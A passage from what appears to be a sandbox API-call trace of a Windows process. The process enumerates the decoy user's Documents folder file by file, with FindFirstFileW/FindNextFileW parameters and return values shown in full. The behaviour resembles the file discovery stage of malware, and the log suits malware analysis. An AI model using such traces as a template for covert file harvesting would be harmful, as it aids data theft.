ftLastWriteTime.dwLowDateTime=0xd8d1e6c0, ftLastWriteTime.dwHighDateTime=0x1d5d86c, nFileSizeHigh=0x0, nFileSizeLow=0x6934, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rHp2e.wav", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a06eff0, ftCreationTime.dwHighDateTime=0x1d5e09f, ftLastAccessTime.dwLowDateTime=0x3fb7df0, ftLastAccessTime.dwHighDateTime=0x1d5e724, ftLastWriteTime.dwLowDateTime=0x3fb7df0, ftLastWriteTime.dwHighDateTime=0x1d5e724, nFileSizeHigh=0x0, nFileSizeLow=0x6747, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TwHTsqQWbRTO.m4a", cAlternateFileName="TWHTSQ~1.M4A")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb467a0c0, ftCreationTime.dwHighDateTime=0x1d5e822, ftLastAccessTime.dwLowDateTime=0x71f21220, ftLastAccessTime.dwHighDateTime=0x1d5df5d, ftLastWriteTime.dwLowDateTime=0x71f21220, ftLastWriteTime.dwHighDateTime=0x1d5df5d, nFileSizeHigh=0x0, nFileSizeLow=0x156b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwxr.png", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a626090, ftCreationTime.dwHighDateTime=0x1d5d840, ftLastAccessTime.dwLowDateTime=0xbc2c4560, ftLastAccessTime.dwHighDateTime=0x1d5d91b, ftLastWriteTime.dwLowDateTime=0xbc2c4560, ftLastWriteTime.dwHighDateTime=0x1d5d91b, nFileSizeHigh=0x0, nFileSizeLow=0x14ba7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W7aD8sWB.mkv", cAlternateFileName="")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87f9fb50, ftCreationTime.dwHighDateTime=0x1d5da30, ftLastAccessTime.dwLowDateTime=0xcc8dad90, ftLastAccessTime.dwHighDateTime=0x1d5e37a, ftLastWriteTime.dwLowDateTime=0xcc8dad90, ftLastWriteTime.dwHighDateTime=0x1d5e37a, nFileSizeHigh=0x0, nFileSizeLow=0xd532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x8FlsC43DAjd6C2EfX.rtf", cAlternateFileName="X8FLSC~1.RTF")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5c40e0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0x9dbc5c10, ftLastAccessTime.dwHighDateTime=0x1d5d89d, ftLastWriteTime.dwLowDateTime=0x9dbc5c10, ftLastWriteTime.dwHighDateTime=0x1d5d89d, nFileSizeHigh=0x0, nFileSizeLow=0x8ed0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XkOUHUj-1YSOk-XHR0.mkv", cAlternateFileName="XKOUHU~1.MKV")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxuaxzQ", cAlternateFileName="")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxuaxzQ", cAlternateFileName="")) returned 0 [0165.817] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.817] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.817] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.817] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.817] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.817] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.817] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.817] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.817] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.817] PathFindFileNameW (pszPath="") returned="" [0165.817] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.817] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645bc00, ftCreationTime.dwHighDateTime=0x1d5dc28, ftLastAccessTime.dwLowDateTime=0xe4d16f0, ftLastAccessTime.dwHighDateTime=0x1d57e34, ftLastWriteTime.dwLowDateTime=0xe4d16f0, ftLastWriteTime.dwHighDateTime=0x1d57e34, nFileSizeHigh=0x0, nFileSizeLow=0x16d67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0ekjNGhL.xlsx", cAlternateFileName="0EKJNG~1.XLS")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16db0660, ftCreationTime.dwHighDateTime=0x1d5d825, ftLastAccessTime.dwLowDateTime=0x6505fbe0, ftLastAccessTime.dwHighDateTime=0x1d5d872, ftLastWriteTime.dwLowDateTime=0x6505fbe0, ftLastWriteTime.dwHighDateTime=0x1d5d872, nFileSizeHigh=0x0, nFileSizeLow=0x833f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0f4pt.pptx", cAlternateFileName="0F4PT~1.PPT")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb216a280, ftCreationTime.dwHighDateTime=0x1d55f83, ftLastAccessTime.dwLowDateTime=0xdff84fb0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xdff84fb0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6kq1Q5gxebf0czzCUr2.docx", cAlternateFileName="6KQ1Q5~1.DOC")) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58153d60, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0x98ecf4f0, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x98ecf4f0, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0xf57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8eUHyn88AeSWE.odp", cAlternateFileName="8EUHYN~1.ODP")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e33d20, ftCreationTime.dwHighDateTime=0x1d58eae, ftLastAccessTime.dwLowDateTime=0x57778dd0, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0x57778dd0, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0xc022, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BhlJGzYb5rmhnwh9Mo.docx", cAlternateFileName="BHLJGZ~1.DOC")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d59b20, ftCreationTime.dwHighDateTime=0x1d5890f, ftLastAccessTime.dwLowDateTime=0xceab4620, ftLastAccessTime.dwHighDateTime=0x1d57cdf, ftLastWriteTime.dwLowDateTime=0xceab4620, ftLastWriteTime.dwHighDateTime=0x1d57cdf, nFileSizeHigh=0x0, nFileSizeLow=0x815f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bmVamccT.docx", cAlternateFileName="BMVAMC~1.DOC")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb71f860, ftCreationTime.dwHighDateTime=0x1d5df1c, ftLastAccessTime.dwLowDateTime=0xdd2c72f0, ftLastAccessTime.dwHighDateTime=0x1d5e30f, ftLastWriteTime.dwLowDateTime=0xdd2c72f0, ftLastWriteTime.dwHighDateTime=0x1d5e30f, nFileSizeHigh=0x0, nFileSizeLow=0xdc89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bUI6gz9k xvqeKo.xlsx", cAlternateFileName="BUI6GZ~1.XLS")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976494a0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0xef585fc0, ftLastAccessTime.dwHighDateTime=0x1d5a903, ftLastWriteTime.dwLowDateTime=0xef585fc0, ftLastWriteTime.dwHighDateTime=0x1d5a903, nFileSizeHigh=0x0, nFileSizeLow=0x179b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FORbsqeG8F-z_NR.xlsx", cAlternateFileName="FORBSQ~1.XLS")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fca2e20, ftCreationTime.dwHighDateTime=0x1d58b87, ftLastAccessTime.dwLowDateTime=0x4dee0d80, ftLastAccessTime.dwHighDateTime=0x1d56757, ftLastWriteTime.dwLowDateTime=0x4dee0d80, ftLastWriteTime.dwHighDateTime=0x1d56757, nFileSizeHigh=0x0, nFileSizeLow=0x1002a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gG42X1snm-IOrhlP.xlsx", cAlternateFileName="GG42X1~1.XLS")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739ee340, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xf173ea00, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0xf173ea00, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0x6114, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kb5b.csv", cAlternateFileName="")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab2fa80, ftCreationTime.dwHighDateTime=0x1d5dbae, ftLastAccessTime.dwLowDateTime=0x939f2aa0, ftLastAccessTime.dwHighDateTime=0x1d5e013, ftLastWriteTime.dwLowDateTime=0x939f2aa0, ftLastWriteTime.dwHighDateTime=0x1d5e013, nFileSizeHigh=0x0, nFileSizeLow=0x9385, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kX0JIZYtRxGkB.pdf", cAlternateFileName="KX0JIZ~1.PDF")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NsI7Q_Ai4cQKUwAhGA5", cAlternateFileName="NSI7Q_~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb866c410, ftCreationTime.dwHighDateTime=0x1d5d87a, ftLastAccessTime.dwLowDateTime=0x5eb96620, ftLastAccessTime.dwHighDateTime=0x1d5dbe5, ftLastWriteTime.dwLowDateTime=0x5eb96620, ftLastWriteTime.dwHighDateTime=0x1d5dbe5, nFileSizeHigh=0x0, nFileSizeLow=0x189aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfhlPq h4.ppt", cAlternateFileName="OFHLPQ~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbd45cd0, ftCreationTime.dwHighDateTime=0x1d5e7cc, ftLastAccessTime.dwLowDateTime=0xd069e910, ftLastAccessTime.dwHighDateTime=0x1d58411, ftLastWriteTime.dwLowDateTime=0xd069e910, ftLastWriteTime.dwHighDateTime=0x1d58411, nFileSizeHigh=0x0, nFileSizeLow=0x14f94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ooi75yScG2n4JW.pptx", cAlternateFileName="OOI75Y~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe13793b0, ftCreationTime.dwHighDateTime=0x1d5dca8, ftLastAccessTime.dwLowDateTime=0x6dce2780, ftLastAccessTime.dwHighDateTime=0x1d5dc27, ftLastWriteTime.dwLowDateTime=0x6dce2780, ftLastWriteTime.dwHighDateTime=0x1d5dc27, nFileSizeHigh=0x0, nFileSizeLow=0x664d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pz2UAEy9Ul RH2d.pdf", cAlternateFileName="PZ2UAE~1.PDF")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff3d4dc0, ftCreationTime.dwHighDateTime=0x1d5e61f, ftLastAccessTime.dwLowDateTime=0x4ad41f0, ftLastAccessTime.dwHighDateTime=0x1d5dd85, ftLastWriteTime.dwLowDateTime=0x4ad41f0, ftLastWriteTime.dwHighDateTime=0x1d5dd85, nFileSizeHigh=0x0, nFileSizeLow=0xc98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qG9cSLbVolqRPaJs1.ppt", cAlternateFileName="QG9CSL~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd0c03c0, ftCreationTime.dwHighDateTime=0x1d57a90, ftLastAccessTime.dwLowDateTime=0x2659e0d0, ftLastAccessTime.dwHighDateTime=0x1d5ab9c, ftLastWriteTime.dwLowDateTime=0x2659e0d0, ftLastWriteTime.dwHighDateTime=0x1d5ab9c, nFileSizeHigh=0x0, nFileSizeLow=0x7cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qwrHEdKn1oomXnqN_.xlsx", cAlternateFileName="QWRHED~1.XLS")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fccbbc0, ftCreationTime.dwHighDateTime=0x1d5dc16, ftLastAccessTime.dwLowDateTime=0xcb6300f0, ftLastAccessTime.dwHighDateTime=0x1d5e582, ftLastWriteTime.dwLowDateTime=0xcb6300f0, ftLastWriteTime.dwHighDateTime=0x1d5e582, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RvABmrzNFr7uffIvxM.csv", cAlternateFileName="RVABMR~1.CSV")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa611a490, ftCreationTime.dwHighDateTime=0x1d56072, ftLastAccessTime.dwLowDateTime=0x4de91090, ftLastAccessTime.dwHighDateTime=0x1d5d328, ftLastWriteTime.dwLowDateTime=0x4de91090, ftLastWriteTime.dwHighDateTime=0x1d5d328, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sgDfcqe-OhCyXqFPsb.pptx", cAlternateFileName="SGDFCQ~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79227f40, ftCreationTime.dwHighDateTime=0x1d5a2b2, ftLastAccessTime.dwLowDateTime=0xe6806390, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0xe6806390, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x15004, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t pf4mloRUo8M53tm.pptx", cAlternateFileName="TPF4ML~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab152800, ftCreationTime.dwHighDateTime=0x1d5849d, ftLastAccessTime.dwLowDateTime=0xa2b38210, ftLastAccessTime.dwHighDateTime=0x1d59d52, ftLastWriteTime.dwLowDateTime=0xa2b38210, ftLastWriteTime.dwHighDateTime=0x1d59d52, nFileSizeHigh=0x0, nFileSizeLow=0x10ba9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wbij5VgtvvOhJD.pptx", cAlternateFileName="WBIJ5V~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a80a10, ftCreationTime.dwHighDateTime=0x1d59e1b, ftLastAccessTime.dwLowDateTime=0x26ee6720, ftLastAccessTime.dwHighDateTime=0x1d5aea6, ftLastWriteTime.dwLowDateTime=0x26ee6720, ftLastWriteTime.dwHighDateTime=0x1d5aea6, nFileSizeHigh=0x0, nFileSizeLow=0xf425, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winyJgXww1SkTs0Io.pptx", cAlternateFileName="WINYJG~1.PPT")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6be5f6a0, ftCreationTime.dwHighDateTime=0x1d56e36, ftLastAccessTime.dwLowDateTime=0x5c83bf70, ftLastAccessTime.dwHighDateTime=0x1d5b9cd, ftLastWriteTime.dwLowDateTime=0x5c83bf70, ftLastWriteTime.dwHighDateTime=0x1d5b9cd, nFileSizeHigh=0x0, nFileSizeLow=0x1507f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XdAZp0 KSPHEJbye.docx", cAlternateFileName="XDAZP0~1.DOC")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a8f200, ftCreationTime.dwHighDateTime=0x1d5a13f, ftLastAccessTime.dwLowDateTime=0x927fbe00, ftLastAccessTime.dwHighDateTime=0x1d57501, ftLastWriteTime.dwLowDateTime=0x927fbe00, ftLastWriteTime.dwHighDateTime=0x1d57501, nFileSizeHigh=0x0, nFileSizeLow=0x1123, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zt5ZyKBdOv3Ul.docx", cAlternateFileName="ZT5ZYK~1.DOC")) returned 1 [0165.818] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea3a6c0, ftCreationTime.dwHighDateTime=0x1d5e32f, ftLastAccessTime.dwLowDateTime=0x85e6d3c0, ftLastAccessTime.dwHighDateTime=0x1d5d7b4, ftLastWriteTime.dwLowDateTime=0x85e6d3c0, ftLastWriteTime.dwHighDateTime=0x1d5d7b4, nFileSizeHigh=0x0, nFileSizeLow=0xb567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zw0x1 T.doc", cAlternateFileName="ZW0X1T~1.DOC")) returned 1 [0165.819] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d88c60, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x3532b480, ftLastAccessTime.dwHighDateTime=0x1d5b1da, ftLastWriteTime.dwLowDateTime=0x3532b480, ftLastWriteTime.dwHighDateTime=0x1d5b1da, nFileSizeHigh=0x0, nFileSizeLow=0xc69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_L_jWhbhbh.xlsx", cAlternateFileName="_L_JWH~1.XLS")) returned 1 [0165.819] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d88c60, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x3532b480, ftLastAccessTime.dwHighDateTime=0x1d5b1da, ftLastWriteTime.dwLowDateTime=0x3532b480, ftLastWriteTime.dwHighDateTime=0x1d5b1da, nFileSizeHigh=0x0, nFileSizeLow=0xc69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_L_jWhbhbh.xlsx", cAlternateFileName="_L_JWH~1.XLS")) returned 0 [0165.819] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.819] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: 